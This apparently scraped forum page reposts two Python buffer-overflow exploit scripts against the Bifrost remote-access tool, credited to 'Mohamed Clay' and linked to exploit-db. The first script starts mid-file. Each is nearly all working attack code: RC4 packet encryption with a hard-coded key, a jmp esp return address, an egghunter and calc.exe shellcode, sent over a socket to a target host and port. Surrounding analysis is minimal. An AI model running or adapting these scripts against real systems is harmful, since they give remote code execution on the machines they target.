key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00" xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function eip="\x53\x93\x3A\x7E" # jmp esp User32.dll egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; #calc.exe shellcode (badchars "\x00") buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9" buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44" buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca" buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8" buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26" buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d" buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82" buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45" buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59" buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89" buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09" buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55" buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10" buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1" buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c" buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95" buf +="\xe1\x93\x28" raw=(1000-533-len(egghunter))*"\x90" raw2=(1000-8-len(buf))*"\x41"+"|" command=30 tmp=hex(command).split("0x")[1] data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random() out=rc4crypt(data,key) l=header(bif_len(str(hex(len(data))).split("0x")[1])) out=l+out data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|" out2=rc4crypt(data2,key) l=header(bif_len(str(hex(len(data2))).split("0x")[1])) out2=l+out2 th = threading.Thread(name='exploit', target=exploit) th.setDaemon(True) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.sendall(out2) th.start() s.recv(1024) print "\n[*] By : Mohamed Clay" print "[*] Exploit completed\n"
  25. Matt
    Author : Mohamed Clay Source : http://www.exploit-db.com/exploits/26493/ Code : #!/usr/bin/python2.7 #By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys def rc4crypt(data, key): x = 0 box = range(256) for i in range(256): x = (x + box[i] + ord(key[i % len(key)])) % 256 box[i], box[x] = box[x], box[i] x = 0 y = 0 out = [] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) return ''.join(out) def bif_len(s): while len(s)<8: s=s+"00" return s def header(s): a=(s[0]+s[1]).decode("hex") a+=(s[2]+s[3]).decode("hex") a+=(s[4]+s[5]).decode("hex") a+=(s[5]+s[6]).decode("hex") return a def random(): a="" for i in range(0,8): a+="A"*1000+"|" return a def usage(): print "\n\n\t***************************" print "\t* By : Mohamed Clay *" print "\t* Bifrost 1.2.1 Exploit *" print "\t***************************\n" print "\t Usage : ./bifrost1.2.1 host port" print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n" if len(sys.argv)!=3: usage() exit() HOST=sys.argv[1] PORT=int(sys.argv[2]) key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00" xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function eip="\x53\x93\x3A\x7E" # jmp esp User32.dll egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; #calc.exe shellcode (badchars "\x00") buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9" buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44" buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca" buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8" buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26" buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d" buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82" buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45" buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59" buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89" buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09" buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55" buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10" buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1" buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c" buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95" buf +="\xe1\x93\x28" raw=(1000-533-len(egghunter))*"\x90" raw2=(1000-8-len(buf))*"\x41"+"|" command=30 tmp=hex(command).split("0x")[1] data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random() out=rc4crypt(data,key) l=header(bif_len(str(hex(len(data))).split("0x")[1])) out=l+out s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.sendall(out) print "\n[*] By : Mohamed Clay" print "[*] Exploit completed\n"
×
×
  • Create New...